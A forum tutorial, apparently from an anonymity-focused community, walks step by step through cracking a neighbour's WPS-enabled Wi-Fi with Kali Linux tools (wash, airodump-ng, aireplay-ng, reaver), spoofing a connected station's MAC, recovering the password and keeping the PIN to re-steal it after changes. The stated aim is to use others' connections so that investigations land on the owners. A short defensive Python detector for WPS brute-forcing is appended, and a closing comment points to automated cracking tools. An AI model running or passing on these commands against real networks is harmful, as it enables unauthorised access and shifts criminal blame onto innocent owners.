For all of you out there looking to really step up your OpSec, here is a great way to do so. By piggybacking off of someone else's IP (and spoofing your MAC address) while using their internet, you are completely anonymous while browsing online. If for some reason your IP was leaked while using Tor, piggybacking off of someone's network would lead the investigation directly to them (who would be able to claim 100% ignorance).
I would also like to add that since making this guide someone pointed out to me that FrankenScript does the same thing without having to know all of the codes and technical details. However, I have not been able to successfully attack using it.
Using my methods below I have cracked a few pins, with the average time taking about 14-15 hours.
Any comments, criticisms, and questions welcome.
DISCLAIMER: The information I'm providing in this tutorial could be used for illegal activity. Please only use this for lawful purposes (yeah right, like none of us break the law here) and I am in no way responsible if you are somehow caught breaking the law.
Lingo / basic terminal commands:
AP = Access point, the network we are trying to test
Ctrl + C = stop action in terminal.
Now onto the fun.
If you were able to set up the following mostly on your own, this tutorial will be well within your skill set / fairly easy to learn:
- Tails
- PGP
- Tor
You will need the following items to start this process:
- USB stick 16gb or greater
- Latest Kali Linux ISO Download Here
- Wireless Cards capable of packet injection List of recommended ones
- Blank DVD (optional)
- Computer you can boot Kali from (like Tails)
Once you have all of that we can go through the process of burning the Kali ISO to a Disc (or straight to a USB if you like). After burning it to the Disc I booted into Kali and used the installer included with Kali to install it on my 16GB USB drive. I then booted from my USB and made sure my USB wireless card was plugged in before booting (not required, but your wireless card might be called something different than mine). This is a guide for Reaver, so I'm not going into details of how to install Kali on a Disc / DVD; it is almost exactly the same as Tails.
Kali Installation Guides:
Once booted into Kali we can start looking through the wireless activity around us.
Finding an AP to attack
Open a new terminal window and type the following command to list all of your wireless devices:
ifconfig
Output: I will be using "wlan0" for this tutorial.
Identify your wireless card from the list above; mine was wlan0. If yours is named something else, put it in place of mine for this tutorial.
Then put your wireless card into monitor mode with the command:
airmon-ng start wlan0
If any processes are found that could cause trouble you can kill them with the kill command (hitting enter after each line) like so:
kill 1028
kill 1174
kill 1419
kill 1418
For the kill lines, if you get two processes that are numbered one after the other (1418 & 1419), kill the higher numbered one first (1419); otherwise it will give you an error when trying to kill the second one.
Also please note your network card will change name when entering monitor mode. Mine is called "wlan0mon" now; yours will be something similar.
After getting this ready we can find a network to "test." Use the following command to list all networks around you that have a WPS router that we can crack.
wash -i wlan0mon
This will list all of the vulnerable networks in your area; I have quite a few. Find a network with good power and make sure that the listing in the column that reads "WPS Locked" says "No". If it says "Yes" in that column, our attack will not work. Take note of the network's BSSID and Channel number.
After identifying the AP we are testing you can go ahead and press Ctrl + C to stop the function. With the BSSID and the Ch number we can get the info we need to perform our attack incognito.
Monitor just this network by using the command:
airodump-ng -c <ch #> --bssid <AP's bssid> wlan0mon
-c = channel number
--bssid = BSSID of target AP - you can use copy and paste to paste the BSSID in place
The lower set of numbers (BSSID and Station; we will refer to them as BSSID and AP-Station from here on out) are the numbers we need for the rest of this attack. That lower line of info will only show up if a device is connected to the router of the network. After getting this info you can go ahead and stop the function (Ctrl + C).
Now we will spoof our MAC for the attack. (This is optional, but I do it to cover all my tracks.)
Go ahead and stop your monitor mode using this command:
airmon-ng stop wlan0mon
And then use this command to take your wireless device offline to change the MAC (wireless device interface has dropped the "mon" because we took it out of monitor mode):
ifconfig wlan0 down
Then change the MAC address for it using the "macchanger" command:
macchanger -m <AP Station> wlan0
Then issue this command to bring the Wireless device back up:
ifconfig wlan0 up
Then we will start monitor mode again on our wireless device again because we need to be in monitor mode for the attack.
airmon-ng start wlan0
By running "ifconfig" on wlan0mon we can see the MAC spoofing we just did on wlan0 did not carry over to our virtual wireless monitor device:
ifconfig wlan0mon
So we need to spoof our virtual monitor device's MAC now, same as before:
ifconfig wlan0mon down
Use the "macchanger" command again using the "AP Station" from our target network as our new MAC (note: All MAC addresses must match when using the reaver attack - so if spoofed they all need to be the same):
macchanger -m <AP Station> wlan0mon
and then we are going to bring the monitor device back up:
ifconfig wlan0mon up
Now that our MAC is spoofed we are ready to begin our attack. In two separate terminal windows prepare the following commands:
reaver -i wlan0mon -b <bssid of target> -c 6 -N -d 8 -S -L -t 10 -r 3:30 --mac=<AP Station> -vv -A
Breakdown of what the options mean in reaver:
- -c = Channel # of AP
- -N = No Nacks
- -d = delay after each pin attempt in seconds
- -S = dh-Small
- -t = time out time in seconds
- -L = ignore locks from AP
- -r X:Y = recurring rest, every X pin attempts rest Y seconds
- --mac= = spoof MAC address of where attack is coming from. THIS MUST MATCH THE MACs YOU SPOOFED EARLIER, known as <AP Station>
- -vv = very verbose, gives you details about what is happening
- -A = do not associate, telling reaver we will associate using another application.
There are more options in reaver, use this command to get a full list:
reaver --help
The second command to prep in a new terminal window is:
aireplay-ng -1 60 -a <BSSID> -h <AP Station> wlan0mon
Breakdown of options for "aireplay":
- -1 = association repetition set in seconds (i.e. re-associate every 60 seconds in my example)
- -a = target BSSID
- -h = MAC address that association is coming from (must be the same as the MACs we have spoofed previously, AKA <AP Station>)
Command line prepped for both Reaver and Aireplay.
Before we start these we need to open another new terminal window and run "airodump-ng" to make sure the "aireplay-ng" command is looking for the AP on the correct channel:
airodump-ng -c <ch #> --bssid <BSSID> wlan0mon
Once we have that running we can run our "aireplay-ng" command (leave "airodump-ng" running in the background). Run the command we prepped previously:
aireplay-ng -1 60 -a <BSSID> -h <AP Station> wlan0mon
After an "Association Successful :-)" message you can go ahead and stop the "airodump-ng" command (Ctrl + C):
Now that we are associated we can start the reaver attack. Go ahead and enter that command for reaver we prepped earlier:
reaver -i wlan0mon -b <bssid of target> -c <ch #> -N -d 8 -S -L -t 10 -r 3:30 --mac=<AP Station> -vv -A
This is where things get dicey. If you have made it this far you have done most of the work, but each individual router is particular about the settings it needs to successfully enter a pin over and over.
Here is a successfully entered pin:
There can be a lot of errors when trying to crack pins like this, and this method can take between 4 hrs and 4 days. The first time I successfully cracked a pin it took me roughly 14 hours.
If you do run into errors feel free to post them here and I will do my best to help, or (better bet) google the error and you will probably find a solution; that is how I did all of my troubleshooting.
If reaver keeps giving you errors, try different mixtures of delays and rest periods. Most routers don't like a source constantly trying pins and sending info like this, so small breaks in between sets of pin attempts help the router not freak out.
When cracking a WPS network with MAC spoofing on like this you will not get a password at the end of this cracking method. It will end and give you a WPS pin number (Store This Number!!). What you do with this is reset all of your MAC spoofing (unplug and plug back in your USB device) and then run the reaver attack again using the "-p" option with the pin number. So if reaver cracked the pin for you and it was "12345670" you would use this command (after resetting your MACs) to reveal the password:
reaver -i wlan0mon -b <bssid of target> -c <ch #> -N -L -d 8 -p 12345670 -vv -A
You also have to run the association application again while doing this:
aireplay-ng -1 60 -a <BSSID> wlan0mon
I forgot to take a screenshot from the last time I cracked a WiFi but here is what a fully complete reaver screen looks like with a password shown:
The WPS PSK is the password to the network for when you want to log in.
The WPS pin is super useful: if the owner of the AP ever notices us stealing their interwebs and changes their password, we can run reaver with this pin again and it will instantly spit out the new password. So store these two pieces of info in a safe place.
Now we have the password, so all that is left is to boot into Tails, spoof all of our MAC addresses (this option can be found in "more options" at the start menu), and log into the freshly cracked network.
I think this covers most of the basics of using reaver. Please feel free to comment with any questions, criticisms, or tips. If someone is interested I can post a quick guide to booting FrankenScript and using it, but again I have had more success with this method.
Enjoy guys and fuck CISA!
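From the defender's side, the pattern this post describes (a slow stream of failed WPS PIN exchanges with delays and rest periods, plus a re-association every 60 seconds from a MAC that is already connected) is exactly what an AP owner would look for in their access point's logs. The following is an added example, not code from the post or from any of the tools it mentions; the log format is constructed and only loosely modelled on hostapd's WPS-FAIL and association events, and the thresholds are assumptions.

```python
import re
from collections import defaultdict, deque

# Constructed AP event log (not real output from any tool). Times are plain
# seconds so the example runs offline; a real log would carry timestamps.
SAMPLE_LOG = """\
100 wlan0: STA 00:11:22:33:44:55 IEEE 802.11: associated
108 wlan0: WPS-FAIL sta=00:11:22:33:44:55 msg=4 config_error=0
116 wlan0: WPS-FAIL sta=00:11:22:33:44:55 msg=4 config_error=0
124 wlan0: WPS-FAIL sta=00:11:22:33:44:55 msg=4 config_error=0
132 wlan0: WPS-FAIL sta=00:11:22:33:44:55 msg=4 config_error=0
160 wlan0: STA 00:11:22:33:44:55 IEEE 802.11: associated
220 wlan0: STA 00:11:22:33:44:55 IEEE 802.11: associated
230 wlan0: STA 66:77:88:99:aa:bb IEEE 802.11: associated
240 wlan0: WPS-FAIL sta=66:77:88:99:aa:bb msg=4 config_error=0
"""

# Matches either an association event (group 2 = MAC) or a WPS failure (group 3 = MAC).
LINE_RE = re.compile(
    r"^(\d+) \S+: (?:STA (\S+) IEEE 802\.11: associated|WPS-FAIL sta=(\S+))")


def find_wps_abuse(log, fail_limit=3, fail_window=60, assoc_limit=3, assoc_window=180):
    """Return (time, mac, reason) alerts for two sliding-window rules:
    - wps_pin_bruteforce: fail_limit WPS failures from one MAC within fail_window s
      (a normal user mistypes a PIN once or twice, not every 8 seconds).
    - association_churn: assoc_limit associations from one MAC within assoc_window s
      (a legitimate station does not re-associate every minute while staying connected).
    Each alert fires once, as the threshold is crossed."""
    fails, assocs, alerts = defaultdict(deque), defaultdict(deque), []
    rules = {"fail": (fails, fail_limit, fail_window, "wps_pin_bruteforce"),
             "assoc": (assocs, assoc_limit, assoc_window, "association_churn")}
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        t, assoc_mac, fail_mac = int(m.group(1)), m.group(2), m.group(3)
        store, limit, window, reason = rules["fail" if fail_mac else "assoc"]
        mac = fail_mac or assoc_mac
        q = store[mac]
        q.append(t)
        while q and t - q[0] > window:   # drop events older than the window
            q.popleft()
        if len(q) == limit:
            alerts.append((t, mac, reason))
    return alerts


if __name__ == "__main__":
    for t, mac, reason in find_wps_abuse(SAMPLE_LOG):
        print(f"t={t}s {mac} {reason}")  # the mitigation is to disable WPS PIN entry
```

On the constructed log the first rule fires at t=124 and the second at t=220, both for the same station MAC; the second station, with one failure and one association, is not flagged.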
If you use Kali Linux, there is a GUI tool called Fern-Wifi-Cracker and it's literally all point and click. Wifite is an automated version of Reaver.
Kali runs on a live CD/USB just like TAILS, so it's easy to boot up, crack your neighbor's password, and reboot into your regular install.
Edit: You can download Kali for free here. The wordlists (needed for Fern) are located in /usr/share/wordlists when you boot into it.